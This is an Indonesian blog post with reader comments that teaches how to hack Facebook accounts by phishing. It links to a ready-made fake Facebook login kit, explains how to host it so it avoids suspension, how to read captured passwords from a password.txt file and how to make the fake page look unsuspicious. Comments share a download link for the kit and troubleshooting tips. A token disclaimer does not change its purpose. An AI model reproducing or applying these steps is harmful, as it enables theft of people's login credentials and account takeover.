Knowledge is Free | We Share To Everywhere

Tuesday, December 25, 2012

Cara Hack Facebook Dengan Phishing

Mungkin sebagian besar dari sobat sudah tau apa itu web phising dan sudah tau bagaimana cara membuat serta menguploadnya ke salah satu web hoting yang tersedia... Namun saya yakin diantara sobat masih ada yang belum tau dan paham apa itu web phising serta belum tau bagaimana cara menghosting web tersebut ke webhosting yang tersedia. 

Nah pada kesempatan ini saya akan menjelaskan bagaimana cara Membuat Web Phising untuk Mendapatkan Email dan Password beserta Bagaimana cara menghosting filenya...

Sebelum saya menjelaskan cara membuat website phising ini, alangkah baiknya bila sobat mengetahui apa itu Web Phising dan Apa kegunaannya...!!! Web Phising halaman fake login atau halaman palsu dari sebuah website (contoh : halaman utama facebook) dan keguanan dari web phising ini yakni untuk mendapatkan informasi sensitif, seperti email/username, password dan lain sebagainya... 


Sobat bisa mendownload yang sudah siap pakai:

Download Facebook Phishing

Download Facebook Phishing for Mobile

Password: Lihat 


"Mohon sedikit meyisihkan waktunya untuk memberikan donasi, dengan cara mengklik gambar yg berlabel Sponsor.. Terimakasih "

Selanjutnya, Upload filenya ke webhost yang sobat punya. Saran saya agar tidak cepat di suspended, hosting filenya ke webhost yang berbayar, tapi kalau tidak punya uang, sobat bisa gunakan webhost yang gratis.


Untuk tutorial membuat Hosting, silahkan baca Cara Membuat Hosting Gratis Di Idhostinger

Setelah Semua File di upload, sobat tinggal mencobanya. sebelumnya dicek dulu apakah Phisingnya bekerja atau tidak!


untuk melihat Hasilnya, sobat cukup melihatnya dengan menambahkan Password.txt setelah link sobat! Contoh: http://sitesobat/password.txt


Gunakan Kreatifmu agar Facebook Palsu sobat ga dicurigai sebagai Phishing! Sebagai contoh ane kasi liat punya ane... 

DEMO PHISHING FACEBOOK 

 Semoga bermanfaat...!!!

NB : Tutorial ini hanya untuk menambah pengetahuan di bidang IT, bukan untuk disalahgunakan dan saya tidak bertanggung jawab jika ada pihak tertentu yang menyalahgunakan web phising ini...!!!
 

19 comments:

  1. gagal gan,, gmna caranya biar nampil password nya..??

    ReplyDelete
  2. ni passnya >>>>>> http://indocyberarmy.blogspot.com

    ReplyDelete
  3. saved semua email dan pass nya,
    tp kga bisa login :* (

    ReplyDelete
  4. Gak bisa , Ada cara yang lebih mudah lagi??

    ReplyDelete
  5. Gann Master Tuh =

    Setelah Semua File di upload, sobat tinggal mencobanya. sebelumnya dicek dulu apakah Phisingnya bekerja atau tidak!

    Saya Ngak ngerti ;-( Upload Apaan ??
    Sorry Saya Newbie

    ReplyDelete
  6. Gann , bisa enggak kamu bantu saya bikin sitenya...

    ReplyDelete
  7. nih ane kasih.... http://www.mediafire.com/download/18noguy9mfdiau6/Phising+Facebook.zip

    ReplyDelete
  8. Gan pas ane klik file manager 2 kok keluarnya gini?
    Forbidden

    You don't have permission to access /2/ on this server.

    ReplyDelete
  9. gagal filenya berpungsi tapi pass udah log in trus eror....

    ReplyDelete
  10. caraa nya agan di atas uda bagus mungkin yang gak mengerti salah upload file nya mangkanya eror dan gak bisa berfungsi,upload file nya ke dalam folder public_html,tapi hapus dulu folder index.php,sekian makasih bila ada salah mohon maav,kunjungin blog saya di kugadavime.blogspot.com

    ReplyDelete
  11. yang gagal cuman orang oon dan bego

    ReplyDelete
  12. Kok pas buka situs|password.txt error yaa???

    ReplyDelete

Note: Only a member of this blog may post a comment.